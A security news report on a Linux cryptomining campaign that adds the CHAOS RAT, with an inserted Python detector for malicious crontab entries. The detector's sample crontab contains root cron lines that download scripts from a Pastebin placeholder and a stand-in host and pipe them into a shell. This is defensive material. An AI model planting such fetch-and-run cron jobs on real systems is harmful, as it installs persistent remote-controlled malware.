An open-source remote access trojan (RAT) known as CHAOS was utilized in a cryptocurrency mining attack against the Linux operating system.
The campaign, which Trend Micro identified in November 2022, is otherwise virtually unchanged: it still eliminates competing malware and security software before deploying the Monero (XMR) cryptocurrency miner.
“The malware achieves persistence by modifying the /etc/crontab file, a UNIX task scheduler that downloads itself every 10 minutes from Pastebin,” researchers David Fiser and Alfredo Oliveira explained.
This phase concludes with the download of subsequent-stage payloads consisting of the XMRig miner and the Go-based CHAOS RAT.
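The crontab persistence described above is easy to look for from the defender's side. The following is an added example, not code from the Trend Micro report, that parses system-crontab lines and flags high-frequency entries which download remote content (in particular from pastebin.com, the host named above) and pipe it into a shell; the sample crontab, the placeholder Pastebin path and the scoring heuristics are all constructed for the demo.

```python
import re
from typing import Dict, List, Optional

# Constructed sample /etc/crontab for the demo (not taken from any real host).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root curl -fsSL https://pastebin.com/raw/PLACEHOLDER | sh
0 3 * * * root /usr/bin/apt-get update
*/5 * * * * root wget -q -O - http://paste.example.invalid/x | bash
"""

PASTE_HOSTS = ("pastebin.com",)  # host named in the report; extend as needed
FETCH_TOOLS = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")


def parse_crontab(text: str) -> List[Dict]:
    """Parse system-crontab lines: minute hour dom month dow user command."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        parts = line.split(None, 6)
        if len(parts) < 7:
            continue
        entries.append({"minute": parts[0], "user": parts[5], "command": parts[6]})
    return entries


def minute_interval(field: str) -> Optional[int]:
    """Return N for a '*/N' minute field, otherwise None."""
    m = re.fullmatch(r"\*/(\d+)", field)
    return int(m.group(1)) if m else None


def suspicious_entries(text: str, max_interval: int = 15) -> List[Dict]:
    """Flag entries that combine two or more red flags: short interval,
    remote download, paste-site host, or download piped straight into a shell."""
    hits = []
    for e in parse_crontab(text):
        cmd, reasons = e["command"], []
        n = minute_interval(e["minute"])
        if n is not None and n <= max_interval:
            reasons.append(f"runs every {n} min")
        if FETCH_TOOLS.search(cmd):
            reasons.append("downloads remote content")
        if any(h in cmd for h in PASTE_HOSTS):
            reasons.append("fetches from a paste site")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("pipes download into a shell")
        if len(reasons) >= 2:
            hits.append({**e, "reasons": reasons})
    return hits
```

Run it against the real file with `suspicious_entries(open("/etc/crontab").read())`; the same parser applies to files under /etc/cron.d, which use the identical seven-field format.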
The main downloader script and additional payloads are hosted in multiple locations, according to the cybersecurity firm, to ensure that the campaign remains active and new infections continue to occur.
Once downloaded and executed, the CHAOS RAT transmits detailed system metadata to a remote server, in addition to being able to perform file operations, capture screenshots, shut down and restart the computer, and open arbitrary URLs.
“On the surface, the incorporation of a RAT into the infection routine of cryptocurrency mining malware may appear minor,” the researchers said.
“However, given the tool’s variety of functions and the fact that this evolution demonstrates that cloud-based threat actors are still evolving their campaigns, it is crucial for both organizations and individuals to maintain heightened security vigilance.”